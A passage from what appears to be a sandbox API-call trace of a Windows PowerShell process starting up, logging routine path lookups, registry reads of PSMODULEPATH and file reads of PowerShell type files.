lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0025.967] GetLastError () returned 0xcb [0025.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0025.967] GetLastError () returned 0xcb [0025.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0025.967] GetLastError () returned 0xcb [0025.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0025.967] GetLastError () returned 0xcb [0026.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.015] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.016] GetLastError () returned 0x3 [0026.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.017] GetLastError () returned 0x3 [0026.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.017] GetLastError () returned 0x3 [0026.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.017] GetLastError () returned 0x3 [0026.019] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0026.019] GetLastError () returned 0x3 [0026.022] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b64c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0026.022] GetLastError () returned 0x3 [0026.023] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce5b0 | out: phkResult=0x1ce5b0*=0x320) returned 0x0 [0026.023] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ce5f4, lpData=0x0, lpcbData=0x1ce5f0*=0x0 | out: lpType=0x1ce5f4*=0x2, lpData=0x0, lpcbData=0x1ce5f0*=0x6c) returned 0x0 [0026.023] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ce5f4, lpData=0x2b64c0, lpcbData=0x1ce5f0*=0x6c | out: lpType=0x1ce5f4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ce5f0*=0x6c) returned 0x0 [0026.024] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2b64c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0026.024] GetLastError () returned 0x3 [0026.024] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b64c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0026.024] GetLastError () returned 0x3 [0026.024] RegCloseKey (hKey=0x320) returned 0x0 [0026.024] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b64c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0026.024] GetLastError () returned 0x3 [0026.025] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce5b0 | out: phkResult=0x1ce5b0*=0x320) returned 0x0 [0026.025] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ce5f4, lpData=0x0, lpcbData=0x1ce5f0*=0x0 | out: lpType=0x1ce5f4*=0x0, lpData=0x0, lpcbData=0x1ce5f0*=0x0) returned 0x2 [0026.025] RegCloseKey (hKey=0x320) returned 0x0 [0026.063] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2b64c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0026.064] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x1ce118, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0026.064] GetLastError () returned 0x3f0 [0026.064] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0026.064] GetLastError () returned 0x3f0 [0026.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.072] GetLastError () returned 0xcb [0026.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.074] GetLastError () returned 0xcb [0026.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.077] GetLastError () returned 0xcb [0026.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.077] GetLastError () returned 0xcb [0026.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce530 | out: phkResult=0x1ce530*=0x328) returned 0x0 [0026.084] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1ce598, lpData=0x0, lpcbData=0x1ce594*=0x0 | out: lpType=0x1ce598*=0x1, lpData=0x0, lpcbData=0x1ce594*=0x74) returned 0x0 [0026.085] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1ce578, lpData=0x0, lpcbData=0x1ce574*=0x0 | out: lpType=0x1ce578*=0x1, lpData=0x0, lpcbData=0x1ce574*=0x74) returned 0x0 [0026.086] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x1ce578, lpData=0x2b64c0, lpcbData=0x1ce574*=0x74 | out: lpType=0x1ce578*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ce574*=0x74) returned 0x0 [0026.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ce0f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0026.086] GetLastError () returned 0xcb [0026.086] SetErrorMode (uMode=0x1) returned 0x1 [0026.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ce578 | out: lpFileInformation=0x1ce578*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0026.086] GetLastError () returned 0xcb [0026.086] SetErrorMode (uMode=0x1) returned 0x1 [0026.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0026.088] GetLastError () returned 0xcb [0026.088] SetErrorMode (uMode=0x1) returned 0x1 [0026.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce56c | out: lpFileInformation=0x1ce56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0026.089] GetLastError () returned 0xcb [0026.089] SetErrorMode (uMode=0x1) returned 0x1 [0026.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0026.091] GetLastError () returned 0xcb [0026.091] SetErrorMode (uMode=0x1) returned 0x1 [0026.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce56c | out: lpFileInformation=0x1ce56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0026.092] GetLastError () returned 0xcb [0026.092] SetErrorMode (uMode=0x1) returned 0x1 [0026.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.097] GetLastError () returned 0xcb [0026.099] GetACP () returned 0x4e4 [0026.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0026.110] GetLastError () returned 0x0 [0026.110] SetErrorMode (uMode=0x1) returned 0x1 [0026.112] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0026.112] GetLastError () returned 0x0 [0026.114] GetFileType (hFile=0x32c) returned 0x1 [0026.114] SetErrorMode (uMode=0x1) returned 0x1 [0026.114] GetFileType (hFile=0x32c) returned 0x1 [0026.116] ReadFile (in: hFile=0x32c, lpBuffer=0x1ee1ed4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1ee1ed4*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.118] GetLastError () returned 0x0 [0026.118] ReadFile (in: hFile=0x32c, lpBuffer=0x1ee1ed4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1ee1ed4*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.118] GetLastError () returned 0x0 [0026.119] ReadFile (in: hFile=0x32c, lpBuffer=0x1ee1ed4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1ee1ed4*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.119] GetLastError () returned 0x0 [0026.120] ReadFile (in: hFile=0x32c, lpBuffer=0x1ee1ed4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1ee1ed4*, lpNumberOfBytesRead=0x1ce4e4*=0xcf3, lpOverlapped=0x0) returned 1 [0026.120] GetLastError () returned 0x0 [0026.120] ReadFile (in: hFile=0x32c, lpBuffer=0x1ee1367, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1ee1367*, lpNumberOfBytesRead=0x1ce4e4*=0x0, lpOverlapped=0x0) returned 1 [0026.120] GetLastError () returned 0x0 [0026.120] ReadFile (in: hFile=0x32c, lpBuffer=0x1ee1ed4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1ee1ed4*, lpNumberOfBytesRead=0x1ce4e4*=0x0, lpOverlapped=0x0) returned 1 [0026.120] GetLastError () returned 0x0 [0026.121] CloseHandle (hObject=0x32c) returned 1 [0026.121] GetLastError () returned 0x0 [0026.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce044, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0026.122] GetLastError () returned 0x0 [0026.122] SetErrorMode (uMode=0x1) returned 0x1 [0026.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ef3248 | out: lpFileInformation=0x1ef3248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0026.122] GetLastError () returned 0x0 [0026.122] SetErrorMode (uMode=0x1) returned 0x1 [0026.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0026.123] GetLastError () returned 0x0 [0026.124] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce468 | out: phkResult=0x1ce468*=0x32c) returned 0x0 [0026.124] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce4b0, lpData=0x0, lpcbData=0x1ce4ac*=0x0 | out: lpType=0x1ce4b0*=0x1, lpData=0x0, lpcbData=0x1ce4ac*=0x56) returned 0x0 [0026.124] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce4b0, lpData=0x2b64c0, lpcbData=0x1ce4ac*=0x56 | out: lpType=0x1ce4b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce4ac*=0x56) returned 0x0 [0026.124] RegCloseKey (hKey=0x32c) returned 0x0 [0026.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0026.124] GetLastError () returned 0x0 [0026.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdfa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0026.124] GetLastError () returned 0x0 [0026.175] GetSystemInfo (in: lpSystemInfo=0x1cdbe8 | out: lpSystemInfo=0x1cdbe8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0026.177] VirtualQuery (in: lpAddress=0x1cd3a4, lpBuffer=0x1ce3a4, dwLength=0x1c | out: lpBuffer=0x1ce3a4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0026.216] GetLastError () returned 0x0 [0026.216] SetErrorMode (uMode=0x1) returned 0x1 [0026.216] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0026.216] GetLastError () returned 0x0 [0026.216] GetFileType (hFile=0x32c) returned 0x1 [0026.216] SetErrorMode (uMode=0x1) returned 0x1 [0026.216] GetFileType (hFile=0x32c) returned 0x1 [0026.216] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.219] GetLastError () returned 0x0 [0026.219] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.219] GetLastError () returned 0x0 [0026.219] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.220] GetLastError () returned 0x0 [0026.220] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.220] GetLastError () returned 0x0 [0026.220] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.220] GetLastError () returned 0x0 [0026.222] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.222] GetLastError () returned 0x0 [0026.222] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.222] GetLastError () returned 0x0 [0026.222] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.222] GetLastError () returned 0x0 [0026.222] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.222] GetLastError () returned 0x0 [0026.224] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.224] GetLastError () returned 0x0 [0026.225] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.225] GetLastError () returned 0x0 [0026.225] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.225] GetLastError () returned 0x0 [0026.225] ReadFile (in: hFile=0x32c, lpBuffer=0x1f27664, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x1f27664*, lpNumberOfBytesRead=0x1ce4e4*=0x1000, lpOverlapped=0x0) returned 